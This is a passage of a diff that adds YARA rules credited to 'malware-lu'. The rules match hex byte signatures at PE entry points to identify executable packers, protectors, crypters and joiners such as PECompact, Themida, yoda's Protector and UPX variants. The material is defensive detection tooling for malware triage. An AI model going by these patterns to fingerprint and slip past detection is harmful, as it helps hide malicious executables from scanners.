+	$a1 = { 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 00 0B C0 0F 84 EC 00 00 00 89 85 4D 08 40 00 8D 85 51 08 40 00 50 FF B5 6C 08 40 00 E8 AF 02 00 00 0B C0 0F 84 CC 00 00 00 89 85 5C 08 40 00 8D 85 67 07 40 00 E8 7B 02 00 00 8D B5 C4 07 40 00 56 6A 64 FF 95 74 07 40 00 46 80 3E 00 75 FA C7 06 74 6D 70 2E 83 C6 04 C7 06 65 78 65 00 8D 85 36 07 40 00 E8 4C 02 00 00 33 DB 53 53 6A 02 53 53 68 00 00 00 40 8D 85 C4 07 40 00 50 FF 95 74 07 40 00 89 85 78 07 40 00 8D 85 51 07 40 00 E8 21 02 00 00 6A 00 8D 85 7C 07 40 00 50 68 00 ?? ?? 00 8D 85 F2 09 40 00 50 FF }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02VideoLanClientAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftWrap
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 53 51 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 36 ?? ?? ?? E8 ?? 01 ?? ?? 60 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AI1Creator1Beta2byMZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 FE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule JAMv211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 06 16 07 BE ?? ?? 8B FE B9 ?? ?? FD FA F3 2E A5 FB 06 BD ?? ?? 55 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv0978
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 24 88 40 ?? 87 DD 8B 85 A9 88 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Setup2GoInstallerStub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 53 45 54 55 50 5F 49 4E 46 4F 5D 0D 0A 56 65 72 }
+
+condition:
+		$a0
+}
+	
+	
+rule themida1005httpwwworeanscom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorv1033exescrcomAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ORiENv211DEMO
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5D 01 00 00 CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv0977
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB A0 86 40 ?? 87 DD 8B 85 2A 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv13betaCyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv13bVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 }
+	$a1 = { 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule mkfpackllydd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 81 EB 05 00 00 00 8B 93 9F 08 00 00 53 6A 40 68 00 10 00 00 52 6A 00 FF 93 32 08 00 00 5B 8B F0 8B BB 9B 08 00 00 03 FB 56 57 E8 86 08 00 00 83 C4 08 8D 93 BB 08 00 00 52 53 FF E6 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESpinV03cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BorlandDelphiSetupModuleAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 90 53 56 57 33 C0 89 45 F0 89 45 D4 89 45 D0 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PELOCKnt204
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MacromediaWindowsFlashProjectorPlayerv60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IMPostorPack10MahdiHezavehi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? 00 83 C6 01 FF E6 00 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? 02 ?? ?? 00 10 00 00 00 02 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PluginToExev102BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED 32 42 40 00 50 8F 85 DD 40 40 00 50 FF 95 11 42 40 00 89 85 D9 40 40 00 FF 95 0D 42 40 00 50 FF 95 21 42 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 25 42 40 00 89 85 E1 40 40 00 EB 6C 6A 01 8F 85 DD 40 40 00 6A 58 6A 40 FF 95 15 42 40 00 89 85 D5 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 15 42 40 00 89 47 1C C7 07 58 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 06 ?? ?? 72 ?? B4 09 BA ?? ?? CD 21 B4 4C CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateexeProtectorV18SetiSoftTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule PENinjamodified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5D 8B C5 81 ED B2 2C 40 00 2B 85 94 3E 40 00 2D 71 02 00 00 89 85 98 3E 40 00 0F B6 B5 9C 3E 40 00 8B FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DotFixNiceProtect21GPcHSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 FF 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 B8 ?? ?? ?? ?? 03 C5 50 B8 ?? ?? ?? ?? 03 C5 FF 10 BB ?? ?? ?? ?? 03 DD 83 C3 0C 53 50 B8 ?? ?? ?? ?? 03 C5 FF 10 6A 40 68 00 10 00 00 FF 74 24 2C 6A 00 FF D0 89 44 24 1C 61 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEStealthv276WebToolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 65 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 59 4F 55 52 20 41 44 20 48 45 52 45 21 50 69 52 41 43 59 20 69 53 20 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239DLLcompressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 68 ?? ?? ?? ?? 58 C1 C0 0F E9 ?? ?? ?? 00 87 04 24 58 89 45 FC E9 ?? ?? ?? FF FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 18 E9 ?? ?? ?? ?? 8B 55 08 09 42 F8 E9 ?? ?? ?? FF 83 7D F0 01 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 34 24 5E 8B 45 FC 33 D2 56 8B F2 E9 ?? ?? ?? 00 BA ?? ?? ?? ?? E8 ?? ?? ?? 00 A3 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 C3 83 C4 04 C3 E9 ?? ?? ?? FF 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? FF C1 C2 03 81 CA ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 03 C2 5A E9 ?? ?? ?? FF 81 E7 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 89 07 E9 ?? ?? ?? ?? 0F 89 ?? ?? ?? ?? 87 14 24 5A 50 C1 C8 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnoPiX103110BaGiE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 04 C7 04 24 00 ?? ?? ?? C3 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 00 00 00 02 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IonicWindSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9B DB E3 9B DB E2 D9 2D 00 ?? ?? 00 55 89 E5 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePackV11XMethod2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 }
+	$a1 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule PCGuardv500d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 30 D2 40 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESHiELDv0251
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5D 83 ED 06 EB 02 EA 04 8D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117DLLaPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 53 03 00 00 8D 9D 02 02 00 00 33 FF E8 ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02PEX099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallVirtualizationSuite30XThinstallCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA }
+	$a1 = { 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA ?? ?? ?? ?? 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 ?? ?? ?? ?? E8 DF 00 00 00 73 1B 55 BD ?? ?? ?? ?? E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule NullsoftInstallSystemv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 55 56 57 C7 44 24 10 70 92 40 00 33 DB C6 44 24 14 20 FF 15 2C 70 40 00 53 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 2D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SLVc0deProtectorv11SLV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 C6 00 EB C6 40 01 08 FF E0 E9 4C }
+	$a1 = { E8 01 00 00 00 A0 5D EB 01 69 81 ED 5F 1A 40 00 8D 85 92 1A 40 00 F3 8D 95 83 1A 40 00 8B C0 8B D2 2B C2 83 E8 05 89 42 01 E8 FB FF FF FF 69 83 C4 08 E8 06 00 00 00 69 E8 F2 FF FF FF F3 B9 05 00 00 00 51 8D B5 BF 1A 40 00 8B FE B9 58 15 00 00 AC 32 C1 F6 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule FreeJoinerSmallbuild031032GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 32 ?? 66 8B C3 58 E8 ?? FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SLVc0deProtectorv06SLV
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 97 11 40 00 8D B5 EF 11 40 00 B9 FE 2D 00 00 8B FE AC F8 ?? ?? ?? ?? ?? ?? 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor04600759hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule RpolycryptbyVaska2003071841
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 58 ?? ?? ?? ?? ?? ?? ?? E8 00 00 00 58 E8 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule DBPEvxxxDingBoy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressBGSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4UnextrPasswcheckVirshield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 C0 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv0399Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 02 00 00 00 00 00 00 ?? 00 00 00 00 00 10 00 00 ?? 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? 00 14 00 00 00 00 ?? ?? 00 ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? 00 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? 00 ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 }
+	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
+	$a2 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 3A 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 10 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? 00 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? 56 10 E2 E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 99 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule UPXModifiedstub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Cryptic20Tughack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 40 00 BB ?? ?? ?? 00 B9 00 10 00 00 BA ?? ?? ?? 00 03 D8 03 C8 03 D1 3B CA 74 06 80 31 ?? 41 EB F6 FF E3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KGBSFX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE 00 A0 46 00 8D BE 00 70 F9 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv20betaJeremyCollake
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DevCv4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 83 C4 F4 6A ?? A1 ?? ?? ?? 00 FF D0 E8 ?? FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule DevCv5
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 14 6A ?? FF 15 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0
+}
